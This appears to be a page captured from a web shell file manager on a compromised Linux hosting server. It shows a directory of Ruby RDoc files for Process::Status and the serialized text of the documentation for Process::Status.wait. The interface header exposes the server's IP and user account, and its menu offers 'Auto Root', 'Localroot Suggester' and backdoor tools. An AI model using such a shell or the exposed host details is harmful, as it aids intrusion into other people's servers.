Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ri /
system /
Process /
Status /
Delete
Unzip
Name
Size
Permission
Date
Action
%26-i.ri
837
B
-rw-r--r--
2026-04-07 16:51
%3d%3d-i.ri
591
B
-rw-r--r--
2026-04-07 16:51
%3e%3e-i.ri
885
B
-rw-r--r--
2026-04-07 16:51
cdesc-Status.ri
1.27
KB
-rw-r--r--
2026-04-07 16:51
coredump%3f-i.ri
474
B
-rw-r--r--
2026-04-07 16:51
exited%3f-i.ri
451
B
-rw-r--r--
2026-04-07 16:51
exitstatus-i.ri
547
B
-rw-r--r--
2026-04-07 16:51
inspect-i.ri
490
B
-rw-r--r--
2026-04-07 16:51
pid-i.ri
438
B
-rw-r--r--
2026-04-07 16:51
signaled%3f-i.ri
405
B
-rw-r--r--
2026-04-07 16:51
stopped%3f-i.ri
453
B
-rw-r--r--
2026-04-07 16:51
stopsig-i.ri
415
B
-rw-r--r--
2026-04-07 16:51
success%3f-i.ri
658
B
-rw-r--r--
2026-04-07 16:51
termsig-i.ri
445
B
-rw-r--r--
2026-04-07 16:51
to_i-i.ri
453
B
-rw-r--r--
2026-04-07 16:51
to_s-i.ri
453
B
-rw-r--r--
2026-04-07 16:51
wait-c.ri
1.43
KB
-rw-r--r--
2026-04-07 16:51
Save
Rename
U:RDoc::AnyMethod[iI" wait:ETI"Process::Status::wait;TT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"=Like Process.wait, but returns a Process::Status object ;TI")(instead of an integer pid or nil); ;TI":see Process.wait for the values of +pid+ and +flags+.;To:RDoc::Markup::BlankLine o; ; [ I"#If there are child processes, ;TI"Lwaits for a child process to exit and returns a Process::Status object ;TI"-containing information on that process; ;TI",sets thread-local variable <tt>$?</tt>:;T@o:RDoc::Markup::Verbatim; [I",Process.spawn('cat /nop') # => 1155880 ;TI"KProcess::Status.wait # => #<Process::Status: pid 1155880 exit 1> ;TI"K$? # => #<Process::Status: pid 1155508 exit 1> ;T:@format0o; ; [ I"#If there is no child process, ;TI"/returns an "empty" Process::Status object ;TI"0that does not represent an actual process; ;TI"4does not set thread-local variable <tt>$?</tt>:;T@o;; [I"AProcess::Status.wait # => #<Process::Status: pid -1 exit 0> ;TI"S$? # => #<Process::Status: pid 1155508 exit 1> # Unchanged. ;T; 0o; ; [I"AMay invoke the scheduler hook Fiber::Scheduler#process_wait.;T@o; ; [I"$Not available on all platforms.;T: @fileI"process.c;T:0@omit_headings_from_table_of_contents_below0I"BProcess::Status.wait(pid = -1, flags = 0) -> Process::Status ;T0[ I"(*args);T@,FI"Status;TcRDoc::NormalClass00